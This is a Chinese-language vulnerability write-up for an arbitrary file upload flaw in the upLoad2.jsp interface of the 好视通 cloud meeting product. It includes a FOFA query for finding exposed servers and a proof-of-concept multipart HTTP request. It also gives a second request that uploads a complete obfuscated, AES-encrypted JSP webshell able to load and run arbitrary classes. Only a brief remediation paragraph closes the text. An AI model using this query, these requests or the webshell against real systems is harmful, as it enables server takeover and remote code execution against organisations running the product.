0x01 产品描述:
好视通云会议是一款高效、便捷、低成本的网络视频会议产品,用户只需通过电脑或手机登录好视通云平台,即可快速与全球各地团队进行实时音视频沟通,并同步分享各类数据文档。该产品具有成本低廉、简单易用、安全性高、高清流畅的音视频效果和多种互动交流方式,适用于多种场景和平台
0x02 漏洞描述:
好视通云会议upLoad2接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导致服务器权限被控制。
0x03 搜索语句:
Fofa:body="/loginCheck.do?accessType=isTrueCode" || app="好视通-云会议"
0x04 漏洞复现:
POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip
--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
<% out.print("test"); %>
--1515df1sdfdsfddfs--
上传后拼接路径访问
http://your-ip/fm/upload/test.jsp
webshell上传
POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip
--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="rce.jsp"
Content-Type: application/octet-stream
<%! public byte[] AuS06(String Strings,String k) throws Exception { javax.crypto.Cipher B7734F = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");B7734F.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));byte[] bytes;try{int[] aa = new int[]{122, 113, 102, 113, 62, 101, 100, 121, 124, 62, 82, 113, 99, 117, 38, 36};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr); Object decoder = clazz.getMethod("getDecoder").invoke(null);bytes = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, Strings);}catch (Throwable e){int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}Class clazz = Class.forName(ccstr);bytes = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), Strings);}byte[] result = (byte[]) B7734F.getClass()./*Zkpo2uFw7n*/getDeclaredMethod/*Zkpo2uFw7n*/("doFinal", new Class[]{byte[].class}).invoke(B7734F,new Object[]{bytes});return result;} %><% try { String KXU8J67 = "dfff0a7fa1a55c8c"; session.putValue("u", KXU8J67); byte[] I5T4357 = AuS06 (request.getReader().readLine(),KXU8J67); java./*Zkpo2uFw7n*/lang./*Zkpo2uFw7n*/reflect.Method AuS06 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Zkpo2uFw7n*/("defineClass",byte[].class,int/**/.class,int/**/.class); AuS06.setAccessible(true); Class i = (Class)AuS06.invoke(Thread.currentThread()./*Zkpo2uFw7n*/getContextClassLoader(), I5T4357 , 0, I5T4357.length); Object Q6G6 = i./*Zkpo2uFw7n*/newInstance(); Q6G6.equals(pageContext); } catch (Exception e) {} %>
--1515df1sdfdsfddfs-- 
0x05 修复建议:
首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。